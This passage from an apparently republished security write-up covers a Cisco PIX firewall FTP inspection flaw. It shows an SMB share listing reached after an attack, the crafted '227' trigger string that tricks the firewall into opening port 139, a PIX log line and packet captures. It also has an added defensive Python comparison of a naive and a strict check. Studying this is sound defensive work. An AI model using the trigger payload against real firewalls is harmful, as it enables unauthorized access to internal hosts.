PIX firewall FTP vulnerability allows unauthorized passage through the firewall
2008-12-18 12:19:09 Source: WEB开发网
Program Files D 0 Tue Mar 7 11:35:11 2000
RECYCLER DHS 0 Mon Mar 13 09:35:51 2000
TEMP DA 0 Tue Mar 7 14:36:31 2000
WINNT D 0 Tue Mar 7 14:30:05 2000
64706 blocks of size 65536. 43841 blocks available
smb: > quit
-snip--
We can see that after running the attack program ftp-zone, we can now connect to port 139/tcp on the target host and access its shared directories.
If the PIX has the 'logging console debug' option set, all we see is a single connection to port 21:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr 10.1.2.3/21 laddr 192.168.205.2/21
Attacker IP: 10.1.2.4
PIX IP: 10.1.2.3
Internal IP: 192.168.205.2
The PIX uses NAT to map port 21 of the internal host 192.168.205.2 to port 21 on 10.1.2.3.
Below are the packets captured with tcpdump. In packet 11 we can see that the string that triggers the PIX's unsafe action is:
"227 (10,1,2,3,0,139)': command not understood."
The PIX mistakenly concludes that the FTP server is opening a passive FTP data connection with destination port 139 and an arbitrary source port.
This shows that, before creating a dynamic passive-FTP connection, the PIX only checks whether the packet begins with the string "227 (xxx,xxx,xxx,xxx,prt,prt)".
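The two checks side by side, as an added example that is not from the original article or from Cisco: a prefix-only check of the kind the text describes, which accepts the trigger string above, beside an inspector that reassembles the server's reply stream and accepts a 227 reply only when it is a complete line naming the server itself on a non-privileged port. The sample replies, the assumed "500 '" start of the error reply, and the server address 10.1.2.3 are constructed for the example.

```python
import re
from ipaddress import ip_address

# Constructed samples (not from the article's capture). ERROR_TAIL is the trigger
# string quoted in the text; ERROR_HEAD is the assumed start of the same reply.
LEGIT_REPLY = b"227 Entering Passive Mode (10,1,2,3,4,113).\r\n"
ERROR_HEAD = b"500 '"
ERROR_TAIL = b"227 (10,1,2,3,0,139)': command not understood.\r\n"

# Packet-prefix check modelling the behaviour the article describes: any packet
# beginning "227 ... (h1,h2,h3,h4,p1,p2)" opens a hole, whatever follows.
NAIVE_RE = re.compile(rb"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

# A complete reply line: "227", optional text, the address tuple, optional ".",
# then CRLF and nothing else.
STRICT_RE = re.compile(rb"^227 [^\r\n]*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),"
                       rb"(\d{1,3}),(\d{1,3}),(\d{1,3})\)\.?\r\n$")

def naive_pasv_check(packet: bytes):
    """Return the (host, port) the prefix-only check would open, or None."""
    m = NAIVE_RE.match(packet)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2

class StrictPasvInspector:
    """Reassembles the server-to-client control stream and honours a 227 reply
    only if it is a complete line naming the server on a non-privileged port."""
    def __init__(self, server_ip: str):
        self.server_ip = ip_address(server_ip)
        self.buf = b""

    def feed(self, packet: bytes):
        """Consume one packet payload; return the (host, port) pairs to allow."""
        self.buf += packet
        allowed = []
        while b"\r\n" in self.buf:
            line, _, self.buf = self.buf.partition(b"\r\n")
            m = STRICT_RE.match(line + b"\r\n")
            if m is None:
                continue
            octets = [int(x) for x in m.groups()]
            if max(octets) > 255:
                continue
            host = ip_address(".".join(map(str, octets[:4])))
            if host == self.server_ip and octets[4] * 256 + octets[5] >= 1024:
                allowed.append((str(host), octets[4] * 256 + octets[5]))
        return allowed
```

Feeding the packets in order shows the difference: the prefix check opens 10.1.2.3:139 for the error tail, while the inspector sees one 500 line followed by one valid 227 line and opens only 10.1.2.3:1137.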
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 ()
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
TCP Data
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311